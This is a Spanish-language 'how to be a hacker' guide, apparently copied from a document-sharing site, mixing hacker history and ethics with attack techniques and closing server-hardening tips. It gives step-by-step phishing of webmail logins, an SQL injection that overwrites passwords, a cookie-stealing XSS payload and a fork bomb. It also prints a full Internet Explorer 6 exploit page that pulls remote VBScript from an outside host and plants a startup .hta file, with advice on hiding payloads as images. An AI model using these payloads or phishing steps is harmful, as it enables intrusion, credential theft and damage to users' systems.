Sei sulla pagina 1di 8

Cmo ser un hacker

Inicio | Siguiente

Seguramente usted habr visto ese captulo de la serie CSI donde un juvenil y arrogante
"hacker" coloca su laptop sobre el escritorio para mostrar sus habilidades con... Windows XP!
Pero ms all de los productores televisivos mal informados, el hecho es que mucha gente
suea con ser un hacker. Es comn recibir correos pidiendo ayuda para "tirar" un sitio o robar
una contrasea de hotmail.
Pero antes de continuar debemos aclarar lo que es y no es un hacker. Un hacker es un experto
en computadoras, pero tambin es un revolucionario, un inconforme, un pistn de la
sociedad. La historia de los hackers se remonta a los 60, cuando John Draper (el famoso
Capitn Crunch) se las arregl para construir una caja (la blue box) que simulaba los tonos del
conmutador de la central telefnica segn la frecuencia al pas que se desear comunicar:
2600 Hz para hacer llamadas de larga distancia dentro de EU, 3825 Hz para Argentina, 2400
Hz para la India, etctera. Slo se deba estar atento al leve "clck" del conmutador para
enviar la peticin de conexin.
De este modo se podan hacer llamadas de larga distancia gratis desde cualquier telfono
pblico. La "Blue Box", que se construa con una caja de cereal, se hizo muy popular. En San
Franciso se dieron indicaciones a la polica para revisar a los jvenes con gabardina, pues era
necesaria para ocultar la caja de cereal. Los Steves (Jobs y Wozniak), fundadores de Apple,
eran grandes admiradores del capitn Crunch, construyeron e incluso hicieron mejoras a la
blue box. Un tal Joe Engressia se hizo famoso, pues poda simular los tonos del conmutador
con la boca!

La BlueBox del Capitn Crunch (versin sofisticada)


John Draper, al igual que kevin Mitnick, el hacker ms famoso de todos los tiempos, no estaba
motivado por el dinero, sino por la curiosidad, el orgullo y el desafio intelectual que
implicaba vencer a un sistema que restringa la libertad. Esto es importante, pues los hackers

no estn slo en las computadoras, existen floricultores, mecnicos y chefs que an cuando
no saben usar una computadora pueden ser catalogados como hackers dentro de su actividad.
Hacker es una actitud, una forma de acercarse a lo que uno hace de manera juguetona,
retadora y curiosa. Mozart fue un excelente hacker de la msica.
Slo se puede ser hacker de las cosas que uno le gustan y entusiasman. No se puede ser
hacker por obligacin. Existen otro tipo de personas (sobre todo adolescentes) que se
autollaman hackers, pero no lo son. Ellos presumen de haber entrado a un sistema, robado
una contrasea o borrado una base de datos, se ponen nicknames ridculos como K3rN3li0 o
Ciber||fuel. Estos no son hackers, sino crackers, personas con baja autoestima que buscan un
poco de admiracin y cario poniendo la seguridad de un sistema en entredicho. El trmino
"cracker" fue creado por los hackers por la concepcin errnea que la gente tiene de ellos
gracias a los medios de comunicacin.

2. Los verdaderos hackers


Anterior | Inicio | Siguiente

Los verdaderos hackers poseen un alto sentido de la tica y son muy responsables de lo que
hacen. El cdigo de tica del hacker que no tiene porque coincidir con el cdigo legal ;-)
puede resumirse en los siguientes puntos:
1. El acceso a los ordenadores, y a cualquier cosa que pudiera ensearte algo sobre
cmo funciona el mundo debera ser ilimitado y total.
2. Bsate siempre en el imperativo de la prctica.
3. Toda informacin debera ser libre.
4. Desconfa de la autoridad y la tradicin: piensa por t mismo.
5. Los hackers deberan ser juzgados nicamente por su habilidad en el hackeo, no por
criterios sin sentido como los ttulos, edad, raza o posicin social.
6. Todo es copiable.
7. Los derechos de propiedad intelectual, son inmorales.
8. Se puede ser artista frente a una computadora.
9. Cracker = perdedor
Hablando especificamente de ser un hacker de computadoras, existen varios pasos que se
deben seguir para convertirse en un hacker. Entre ellos estn:
o
o
o
o
o
o
o

Crea tu pgina en internet. Dado que la mayora del hackeo se hace sobre el Web,
debes tener claro como se hacen los sitios de Internet.
Instala Linux en tu computadora. Esto sin duda es lo ms importante, Linux te obliga
a revisar cdigo y opciones de configuracin que te hacen entender cmo funciona una
computadora "hacia adentro" y "hacia afuera".
Regala tanto CDs de software libre como puedas. Hay que hacer algo por la causa.
Aprende un lenguaje de programacin y SQL. Esto es fundamental, te sorprenders
como en unos pocos meses aprendes a dominar Python y comienzas a desarrollar tus propios
programas de hackeo.
Practica, practica, y practica. Todas las horas que puedas.
Publica las cosas que vas aprendiendo. Mantn tu sitio actualizado de las cosas que
vas descubriendo.
Ayuda a los dems. S generoso, cuando ya seas un hacker recuerda que hay otra
generacin de hackers detrs de ti y hay que pasarles la antorcha.

De esta manera llegars a ser un hacker respetado dentro de la comunidad.

Tcnicas de hackeo
Anterior | Inicio | Siguiente

Ahora bien, quizs estas leyendo esto porque quieres hacerte una idea de cmo se hackea un
sitio. Existen varios niveles y tcnicas de hackeo:
Change Coding Este tipo de hackeo es muy divertido y, la mayora de las veces, inocuo. Se
trata simplemente de modificar el cdigo que despliega una pgina de Internet agregando
rdenes en javascript o VB Script desde la barra URL del navegador. Incluso la elemental
pgina de Google ha sufrido este tipo de hacking.
SQL Injection Como habrs notado, muchos sitios en la red muestran una caja de "Buscar" o
"Search". En SQL el punto y coma (;) funcionan como el fin de comando y el doble guin (--)
como comentario. Si sabes el nombre de la tabla (o intentas adivinarlo) donde se guardan los
passwords de los usuarios puedes jugar un poco enviando cosas como: UPDATE users SET
password="hack"; este tipo de hackeo es muy entretenido (horas y horas de sana
diversin ;-) ) y te sorprenders del hecho de que incluso sitios de grandes empresas
internacionales no poseen ningn sistema de filtrado. SQL Ruleezzz!!!
Phising "password harvesting fishing" (cosecha y pesca de contraseas) es una tcninca que
consiste en duplicar (hasta en el ms mnimo detalle) un sitio web verdadero en nuestro
propio servidor. Debemos ir a Hotmail, Gmail, Yahoo!, etctera, ver el cdigo HTML y
guardarlo en nuestro propio server. Luego enviamos un email a la persona de la cual deseamos
su clave con algo como "Alguien muy especial te ha enviado una Ciber-tarjeta, haz click aqu"
y lo enviamos a nuestro propio Webserver en Linux. El usuario cree que est entrando en la
pgina de inicio de Hotmail e introduce su login y password, pero ahora es nuestro!
Dictionary's attack Existen personas (y administradores de sistemas) que piensan que por usar
palabras como "fanerogama"o "porfirogeneta" como password, nadie los podr adivinar. Pero
en realidad esas palabras existen en cualquier diccionario, y los diccionarios que sirven para
revisar la ortografa en los procesadores de texto como AbiWord, tambin pueden ser usados
para intentar logearse dentro de un sistema ajeno. Existen scripts que usan cada palabra de
los diccionarios en espaol, ingls, francs, finlands, turco, etc. para hacer un login. Estos
scripts pueden tardarse mucho tiempo haste encontrar un password que corresponda a la
palabra y cuando lo hacen, envian un email al hacker para avisarle cual palabra es un
password. Los hackers que se consideran a s mismos elegantes y creativos sienten aversin
por este tipo de hackeo pues en el simplemente se aplica la fuerza bruta (y la paciencia).
buffer overflow (o simplemente overflow). Los programas se almacenan en buffers
(secciones contiguas de memoria), bajo ciertas circunstancias los datos que se envan al
buffer sobrepasan su capacidad y la memoria se "desparrama", generalmente esto provoca
que el programa colapse pero muchas veces, durante una pequea fraccin de segundo, la

informacin enviada al buffer puede ejecutarse con los permisos del usuario dueo del
proceso. El hacker (que debe conocer bien C y ensamblador) aprovecha esto, enva muchos
datos al buffer, para desbordarlo y ejecutar cdigo malicioso. Existen pocos hackers con el
suficiente talento como para aprovechar un overflow recin descubierto, el problema es que
luego de un par de semanas de conocido el exploit, comienzan a aparecer en la red scripts
que automatizan el hackeo y todos los script kiddies comienzan a ejecutarlos. Solucin:
coloque un "apt-get -f -y dist-upgrade" en el cron y mantngase informado.
A los errores en la programacin se les conoce como "bugs" o bichos, la mayora de los bugs
slo hacen que los programas no funcionen como deben pero algunos pueden ser aprovechdos
para violar la seguridad, a estos bugs se les conoce como "exploits". Es decir, no todos los bugs
son exploits pero todo exploit es un bug.

Denegation of Service o DOS La denegacin de un servicio implica que el hacker ha


aprovechado un bug en un programa para " tirar" un servicio del servidor. Generalmente se
trata del Webserver. El IIS de Microsoft es particularmente vulnerable a este tipo de ataques.
Tanto el Change Coding como el DOS son hacks relativamente benvolos pues no implican
(necesariamente) a un intruso en el sistema.
Aplication level Esto ya es ms serio, alguien se ha apropiado de una aplicacn del sistema.
La mayora de las veces se trata de una aplicacin Web como PHP-Nuke o MyAdmin. Sin
embargo en ocasiones el dominio de una aplicacin conduce a tener ms accesos y facilidades
en el hackeo.
Root hacking Este es el hack ms grave, el hacker ha tomado el control del sistema y puede
hacer lo que quiera con l. Generalmente el hacker tratar de pasar desapercibido y crera
un usuario con todos los derechos para entrar cuando quiera al sistema y regodearse de lo
poco hbil que es el administrador.
Hay que considerar que muchas veces no existe una diferencia clara en estos niveles. Muchos
hackeos al root empezaron siendo un simple juego de Cross Scripting con el cual el hacker
obtuvo el password de PHPNuke, con lo cual se hizo con el password de Mysql y dado que era
una versin no actualizada de Mysql, ejecut un overflow con el que se hizo root. Si
detectamos un root hacking lo primero es desconectar el equipo de la red, hacer un anlisis
forense de los paso del hacker, respaldar y formatear el disco duro incluyendo el MBR. Muchos
administradores se sienten avergonzados y reinstalan el sistema rpidamente y sin decirle a
nadie que ha sido hackeado. Esta es una actitud equivocada, sea humilde y reconozca que ha
sido vencido en buena lid. Infrmele a sus colegas y hagan juntos el anlisis de cmo fue que
el intruso entr y como mejorar las polticas para que eso no vuelva a ocurrir. Un hacker
puede ensearle muchsimo sobre seguridad, an cuando no hubiese tenido ninguna intencin
de ello.
Cross Scripting, o XSS, es una tcnica de hackeo que consiste en enviar informacin maliciosa
a travs del browser. En versiones anteriores de Internet Explorer era suficiente con colocar

?op=userinfo&uname=<script>alert(document.cookie);>/script>
En el URL para ver la informacin de otros usuarios en un sitio de ventas por Internet.
Generalmente todo ataque comienza con nmap, este es un programa de escaneo de puertos.
El escaneo de puertos permite conocer que sistema operativo y que servicios posee un
servidor de la red. Si no tiene nmap instlelo con apt-get. Algunas opciones de escaneo de
nmap slo pueden ejecutarse como root:
# nmap -sS -sV -P0 www.algoaqui.com
Lo que ver, luego de un minuto de espera, ser la lista de los servicios y el programa que los
ejecuta (Apache, Qmail, SSH, vsFTP, etctera). Cmo funciona nmap?, bueno, es como si
arrojara piedritas a las ventanas de una casa para ver quin se asoma y cmo es. De la misma
manera nmap envia miles de peticiones de distintos tipos (TCP/UDP) a todos los puertos del
servidor esperando que alguien le conteste. Los programas creen que alguien los est
llamando pero nmap no mantiene contacto: slo quiere saber si hay alguien en esa
ventana ;-). De esta manera muchas herramientas pensadas para detectar intrusos nunca se
enteran que nmap estuvo husmeando por sus puertos.
En la pelcula Matrix se puede ver a Trinity usando Nmap para hackear un exploit de la versin
1 de SSH:

www.insecure.org

Tenga cuidado, en Estados Unidos y varios pases de Europa el escaneo de puertos es un delito
y varias corporaciones se han tomado muy en serio seguirle la pista de los husmeadores y
acusarlos con su proveedor de internet. De hecho, si usted frecuenta el sitio de nmap y sus
listas de correo, seguramente su nombre ya est en alguna base de datos del FBI. Por
supuesto, como muchas otras leyes, estas leyes son idiotas: sin gente escaneando puertos y
tratando de entrar a los sistemas an estaramos usando Windows 3.11. El mundo tiene una
deuda con los hackers que se niega a reconocer, sin ellos el comercio electrnico hubiese sido
imposible. Si usted est en Amrica Latina no se preocupe, nuestros legisladores ni siquiera
saben (ni les interesa saber) qu es un escaneo de puertos.
Una vez que sepas que programas se estn ejecutando realiza una busqueda en google sobre
algn exploit relacionado. En todos los programas, tarde o temprano, se descubre una

vulnerabilidad, con suerte, el admistrador del servidor no ha actualizado en semanas o meses


y t puedes intentar entrar. Existen muchos scripts, sobre todo de Perl, que intentan hackear
un sitio slo ejecutndolos, hay mucha gente que no tiene idea de cmo funcionan estos
scripts y simplemente los ejecutan hacia un servidor. Cada tres o cuatro das en mi log de
Apache aparece alguien que corri uno de esos scripts... que eran para IIS! A estos
soterutanos se les conoce como Script Kiddies y conforman un vergonzoso tipo de lamer.
Si entras a un IRC preguntando sobre cmo aprender a hackear, algn inconsciente, por
jugarte una broma, te dir que hace poco l descubri una forma de tirar el sitio de Microsoft
y te pedir que escribas en el shell:
# nmap-O www.microsoft.com && :(){ :|:& };:
No lo hagas! tu sistema se congelar por falta de memoria y la nica manera de "destrabarlo"
ser reiniciar todo el equipo con el botn de reset del CPU.
Un hack que est de moda es un hoyo crtico de seguridad en el IE 6 de Windows XP, este hoyo
est presente incluso si se tiene el Service Pack 2 y afecta tanto a la versin Home, como la
"Professional" (Microsoft gast cientos de millones en el SP2 pero al parecer de poco sirvi).
Fijate en la siguiente pgina sp2rc.html:
<OBJECT id="localpage" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\--PCHealth\HelpCtr\System\blurbs\tools.htm">---</OBJECT>;
<OBJECT id="inject" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:
execScript("document.write(\"<script language=\\\"vbscript\\\"
src=\\\"http://www.mononeurona.org/writehta.txt\\\"\" +String.fromCharCode(62)+\"
</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>
<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>
El objeto id: localpage (que posee un formato de extensin de los archivos de ayuda de
Windows) le dice a hhctrl.ocx que abr una ventana de ayuda para
C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm (un archivo normal del sistema que
est en todos los Windows XP).
El segundo objecto id: inject llama al script hospedado en
www.mononeurona.org/writehta.txt que inyecta el cdigo remoto de este archivo, haciendo

un XSS tpico. El archivo writehta.txt contiene instrucciones maliciosas para crear un objeto
ADODB.Connection:
Dim Conn, rs Set Conn = CreateObject("ADODB.Connection") Conn.Open "Driver={Microsoft
Text Driver (*.txt; *.csv)};" & _ "Dbq=http://www.mononeurona.org;" & _
"Extensions=asc,csv,tab,txt;" & _ "Persist Security Info=False" Dim sql sql = "SELECT * from
foobar.txt" set rs = conn.execute(sql) set rs =CreateObject("ADODB.recordset") rs.Open
"SELECT * from foobar.txt", conn rs.Save "C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\ Microsoft Office.hta", adPersistXML rs.close conn.close window.close
Este archivo es usado para ejecutar un query SQL: sql = "SELECT * from foobar.txt", donde
foobar.txt es hospedado en el servidor FTP del atacante (el cual est configurado para
permitir el acceso annimo). El resultado del query se salva en el archivo C:\Documents and
Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta.
El objeto ADODB y el archivo foobar.txt tambin pueden ejecutarse colocndolos escondidos
como si fuesen una imagen: <img id="dyn" src="malwarez6.mcb" border="0"> todos los
antivirus estn configurado para no escanear los archivos de imgenes de modo que podemos
colarnos con facilidad al sistema.
Practicamente no hay lmites en lo que uno puede guardar en este archivo hta y adems,
como se guarda en el men "All Users" se ejecuta cada vez que un usuario se logea en
Windows XP. Por supuesto lo primero que una persona maliciosa hara sera buscar los nmeros
de tarjetas de crdito y los password de todo el sistema Gracias Microsoft!
Y todo esto lo hemos hecho sin que el usuario tuviese que recibir un email o apretar un botn,
simplemente entrando a la pgina sp2rc.html. Miles de pginas en Internet tienen este cdigo
y si usted usa Internet Explorer 6 para navegar seguramente ya tiene el archivo hta en su
disco pues los antivirus no lo detectan. Como digo, este cdigo est muy de moda, y al
parecer no habr parche hasta finales del 2005. Los que usan Mozilla-Firefox en XP estn a
salvo, pues este cdigo no les afecta ;-). De cualquier manera si se ve a obligado a usar
Windows XP por la necesidad de usar CorelDraw o Autocad no navegue en este sistema
operativo. Al terminar de usar ese programa, bootee a Linux (porque tiene Linux verdad?) y
desde ah navegue, consulte su email y use Messenger.

Consejos para no ser hackeado


Anterior | Inicio

Si t, como muchos de nosotros, tienes un servidor Linux en la red, estos son los consejos
bsicos de seguridad:
1. Instala lo mnimo indispensable Realiza un deborphan cada tanto, no instales samba
en un equipo que tiene webserver.
2. Usa password alfanumricos Mezcla nmeros y letras como caktus90 o 8qwer9. No
uses passwords de palabras que estn en el diccionario. No uses un password del
sistema para suscribirte a una lsta de correo o un foro.
3. No instales Telnet y FTP Prefiere SSH y un servidor FTP sobre SSL como vsFTP. No
permitas accessos remotos del root por SSH. Permite un solo usuario en AllowUsers
para evitar ataques de diccionario. Trata de encriptar todo lo que entre al sistema,
incluyendo el correo.
4. Actualiza cada semana De preferencia realiza las actualizaciones de noche, si aptget sugiere instalar un nuevo archivo de configuracin en lugar del que ests usando
prefiere el que trae el paquete, muchas veces el problema no es el programa sino la
configuracin.
5. No instales las X Un servidor no siquiera debera de tener monitor, todo debe hacerse
a travs de SSH.

6. Enjaula los demonios Corre apache, OpenSSH y la base datos de datos "enjaulados"
en un chroot.
7. Watch Log Instala un reporteador de logs que te envie un reporte general del sistema
cada tres das, hay mucha informacin til en los logs que se pierde por no saber
extraer la informacin.
8. No instales compiladores Si necesitas compilar un nuevo kernel, desinstala gcc y el
paquete libc6-dev luego de bootear con el nuevo kernel.
9. Suscrbete a una lista de anuncios de seguridad Existen muchas, tambin puedes
visitar sitios como La cofrada donde se anuncian bugs de seguridad y cmo
corregirlos.
10. Nmap on myself Una forma de descubrir si un troyano ha abierto un backdoor es
correr nmap contra nuestro propio servidor. As te dars una idea de lo que un hacker
(o cracker) vera si escanea tu servidor.
11. Apache mod_security No s porque este magnfico mdulo no viene por omisin pero
practicamente todos los Cross Scripting quedan anulados con l.
12. MVC El model view controller no slo sirve para separar el diseo de la programacin
sino que incrementa la seguridad. Si estas haciendo una aplicacin web con python,
php o perl crea una clase para la base de datos que guarde los valores, cierra la base
de datos y despus inserta los valores en el cdigo XHTML.

No hackeamos cuentas de hotmail.com, no preguntes como ser un hacker: instala Linux en tu


equipo con el Webserver, programa en Perl y sers un hacker.

Potrebbero piacerti anche